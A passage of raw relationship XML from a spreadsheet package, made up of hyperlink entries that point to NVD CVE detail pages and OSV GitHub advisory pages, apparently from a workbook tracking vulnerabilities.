Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId1081" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet8.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81963" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73006" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73012" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73013" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73016" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73023" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73028" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77480" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77481" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77482" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77483" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77484" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77486" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77487" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77495" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78456" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80083" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80096" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69421" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69475" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69532" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69571" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69580" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69584" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69687" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69707" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69709" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69738" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId153" /><Relationship 